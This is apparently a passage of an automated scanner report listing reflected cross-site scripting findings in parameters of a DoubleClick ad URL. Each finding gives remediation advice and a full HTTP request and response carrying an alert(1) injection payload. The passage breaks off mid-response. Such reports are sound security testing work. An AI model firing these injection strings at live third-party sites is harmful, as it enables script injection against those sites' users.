HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:11:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
515392/1%3Bu%3D18499500%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245bb6a7"-alert(1)-"38985baca84&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickT
...[SNIP]...

1.105. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 247bf"-alert(1)-"bcccf64206b was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428247bf"-alert(1)-"bcccf64206b&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:07:00 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428247bf"-alert(1)-"bcccf64206b&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone");
var wmode = "opaque";
var bg
...[SNIP]...

1.106. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93190"-alert(1)-"bf63948427f was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=1793440593190"-alert(1)-"bf63948427f&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5739
Date: Tue, 28 Jun 2011 03:08:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
0%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=1793440593190"-alert(1)-"bf63948427f&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_1weekpass.html%3F__source%3Domd_1week_Outer_xplusone");
var wmode = "opaque";
var bg = "same as S
...[SNIP]...

1.107. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2df8"-alert(1)-"1d6528d0a37 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341f2df8"-alert(1)-"1d6528d0a37&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5741
Date: Tue, 28 Jun 2011 03:07:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341f2df8"-alert(1)-"1d6528d0a37&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_fol.html%3F__source%3Domd_fol_Outer_xplusone");
var wmode = "opaque";
var bg = "same
...[SNIP]...

1.108. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dab"-alert(1)-"15ea4c0569c was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=9795614dab"-alert(1)-"15ea4c0569c&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:06:11 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
1001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=9795614dab"-alert(1)-"15ea4c0569c&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone");
va
...[SNIP]...

1.109. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd794"-alert(1)-"41d93ebe777 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288dd794"-alert(1)-"41d93ebe777&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5668
Date: Tue, 28 Jun 2011 03:06:38 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288dd794"-alert(1)-"41d93ebe777&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_2nddayfree.html%3F__source%3Domd_2df_Outer_xplusone");
var wmode = "op
...[SNIP]...

1.110. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a54e"-alert(1)-"f7737f749a5 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=156493a54e"-alert(1)-"f7737f749a5&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5725
Date: Tue, 28 Jun 2011 03:05:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
3Bu%3D17941001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=156493a54e"-alert(1)-"f7737f749a5&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kong_2nddayfree.html%3F__source%3Domd_2df_Out
...[SNIP]...

1.111. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8672a"-alert(1)-"4eda465726c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=979568672a"-alert(1)-"4eda465726c&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5735
